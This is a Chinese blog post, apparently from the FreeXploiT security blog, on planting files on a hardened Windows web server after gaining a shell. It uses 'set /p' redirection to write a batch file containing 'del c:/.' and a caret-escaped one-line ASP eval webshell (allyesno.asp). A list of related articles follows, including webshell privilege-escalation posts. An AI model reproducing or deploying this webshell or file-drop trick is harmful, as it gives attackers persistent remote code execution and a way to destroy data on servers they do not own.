假如对方是个BT(ALLyeSNO)

主机端口策略设置与文件上传办法
最新推荐文章于 2022-06-14 22:18:40 发布
原创 最新推荐文章于 2022-06-14 22:18:40 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#bt #javascript #web服务 #server #shell #c

博客介绍了主机安全策略设置,禁止本地主机连接对方端口,允许他人连接自身80端口,去除部分服务,仅提供web服务。还探讨了在获得主机shell后上传文件的办法,涉及利用set命令及JavaScript代码。
利用安全策略禁止本地主机连接去对方任何端口!
然后在允许别人连接自己的80端口!
把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务!
关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件?

呵呵 改内核去掉了echo?

别怕 我们还有set 嘛

set/p allyesno=del c:/.>allyesno.bat

如果遇到转义字符就是^了 嘎嘎。。。

set/p allyesno=^<SCRIPT RUNAT^=SERVER LANGUAGE^=JAVASCRIPT^>eval^(Request.form^('^#'^)+''^)^</SCRIPT^>>allyesno.asp
以太坊小知识(五)——difficulty、totalDifficulty、cumulativeGasUsed、gasUsed
KeenCryp的博客
01-11 2307
difficulty &amp; totalDifficulty eth.getBlock(22) 输出: { difficulty: 17247064057, extraData: "0x476574682f6b6c6f737572652f76312e302e302d66633739643332642f6c696e ...
用镜像搭建一个新以太坊节点并部署合约(演示)
DDFFR的博客
08-09 3904
docker run -it –name node6 daocloud.io/ubuntu/node cd privategeth geth –datadir ./data/00 init genesis.json geth –identity “haha” –datadir ./data/00 –networkid 12345 –rpcapi “db,eth,net,web3” –p
2020-09-08
weixin_41576919的博客
09-08 1239
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 @[TOC](2020-09-08) 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 #1 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 #2 二、使用步骤 1.引入库 代..
以太坊Ethereum区块中的Merkle trie:state,transaction,receipt
05-03
NULL 博文链接:https://lobin.iteye.com/blog/2323163
What is and how to calculate 'cumulative gas used'?
harrietliu的专栏
07-13 1290
First of all, let's understand what is the cumulative gas used. cumulativeGasUsed: Number - The total amount of gas used when this transaction was executed in the block. As suggested by Java
MD5加强验证 挑战王小云破解 【 ALLyeSNO
FreeXploiT
05-30 4001
Author : allyesnoTeam   : freexploitDate     : 2006-05-30做梦想到了一个加强md5验证的方法 醒来了赶紧测试一下地球人都知道MD5 被王小云破了!!!破了!!!破了!!!破了!!!破~~(shut up)其实不是破了而是用他们的算法,在数个小时内就可以找到MD5碰撞。就是你用一台IBM P690数小时内能创造出两个MD5相同 内容
bat版鸡鸡管理器 【ALLyeSNO
FreeXploiT
05-07 2495
Term   : FreeXploiT Author : ALLyeSNODate   : 2005-5-8仿照kevin1986的vb版肉肉管理器的bat版鸡鸡管理器kevin这个工具蛮好玩的,其中直接调用了mstsc文件引起了我的兴趣,采用的方式可以有以下几种1。vb有现成的终端连接控件,直接添加使用2。捕获mstsc的窗口再从mdb读取信息添加3。存在命令行的发送形式,以此调用如果要写bat
CMD下修改注册表 完全攻略(FreeXploiT搜集 整理 热荐)
FreeXploiT
11-26 2870
ALLyeSNO注:先来段精彩的【 本文未包含zzzevazzz 写的do all in cmd 里面使用inf 修改注册表的 方法 】regedit虽是gui下使用的东东 但其实是有未公开的参数的 可以在cmd下使用regedit的运行参数REGEDIT [/L:system] [/R:user] filename1REGEDIT [/L:system] [/R:user] /C filenam
以太坊中GetTransactionReceipt 与 GetTransactionByHash区别
09-05 5289
1:GetTransactionReceipt 返回的gas是真实交易消耗的 blocknumber不为空   GetTransactionByHash返回的gas是传过去的值 blocknumber有可能为空   2: cumulativeGasUsed 表示该交易所在块中的所有已被打包的交易中的gas的总和。  ...
以太坊开发文档09 - javascriptApi
Lee的程序空间
12-14 1万+
Web3 JavaScriptÐappAPI 为了让您的应用程序能够在以太坊上工作,您可以使用web3.js库web3提供的对象。在底层,它通过RPC调用与本地节点通信。web3.js与任何暴露RPC层的以太坊节点一起工作。 web3包含eth对象 - web3.eth(专门用于以太坊区块链交互)和shh对象 - web3.shh(用于Whisper交互)。随着时间的推移,我们将介绍其他web
以太坊bloom和logs及代码解析
cz911005的博客
06-14 4699
以太坊 bloom logs getLogs eth_getLogs
以太坊的getTransactionReceipt
Harry Wong的博客
01-06 1585
摘要以太坊的getTransactionReceipt得到logs,里面有几个log,说明合约内抛出了几个事件,用对应事件解析即可。 getTransactionReceipt得到logs,里面有3个log,说明合约内抛出了3个事件,用对应事件解析即可。 ...
开发以太坊遇到的几个问题
changliangwl的专栏
03-02 3154
1.数据同步(根据帐号查询历史交易信息) https://ethereum.stackexchange.com/questions/2531/common-useful-javascript-snippets-for-geth/3478#3478   function getTransactionsByAccount(myaccount, startBlockNumber, endBloc...
谈谈区块链:以太坊的UTXO
well_2000_82的博客
02-16 3190
本来并没有计划写这篇文章,只是这两天微信里有一篇文章传播的比较厉害,叫:《其实并没有什么比特币,只有UTXO》。其中有这么一句话:HyperLedger 和Ethereum 一开始并没有采用 UTXO,现在前者已经切换回 UTXO,后者打算增加这个选项。很多朋友过来问我有没有这么回事,所以专门写一篇文章来阐述我的观点。这篇文章给大家造成很大的困扰,是因为大家都知道以太坊和Hyperledger当前...
动手编写一个以太坊智能合约
热门推荐
区块链大本营
09-14 2万+
一个以太坊节点提供一个RPC界面。这个界面给Ðapp(去中心化应用)访问以太坊区块链的权限和节点提供的功能,比如编译智能合约代码,它用JSON-RPC 2.0规范(不支持提醒和命名的参数) 的子集作为序列化协议,在HTTP和IPC (linux/OSX上的unix域接口,在Windows上叫pipe’s)上可用。
最强以太坊源码解析-02-以太坊架构图
人生有梦不怕迟
12-16 1565
今天在网上看到一副描述以太坊框架的图示,拿过来分享一下: 这张图很犀利,建议诸位去按照这个图原封不动的画一遍,相信会有很多收获!
WEBSHELL权限提升(菜菜)
FreeXploiT
10-15 8781
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL              啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望
ALLyeSNO 优化版浩方 第二版 Ver:2007.06.15 清除广告 自动挤房间
FreeXploiT
06-15 8611
allyesno 优化版浩方 第二版 Ver:2007.06.15 正式发布ALLyeSNO优化版浩方 2007.06.151.按Ctrl+F1挤房间 按Ctrl+F2停止挤房间 (一般情况下会自动停止 无需按Ctrl+F2停止)2.可以挤浩方对战平台的任意房间,包括浩方大厅房间,浩方引擎房间,CS房间注:如果进去游戏后 再次挤房间 我只测试了反恐大联盟的CS版本 其他CS版本没有测试过 所以
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8413
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
迅速删除非法文件名代码的 0day 呵呵
FreeXploiT
11-12 7822
allyesno:我们会遇到很多所谓非法的文件名例如 .. con nul 等等FlowerCode 给出了以下方法可以快速删除这些文件名http://hi.baidu.com/flowercode/blog/item/3f68be02a7cfd10d4bfb519f.html 两行代码搞定,迅速删除使用非法文件名的文件及文件夹  2007年06月04日 星期一 19:08
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值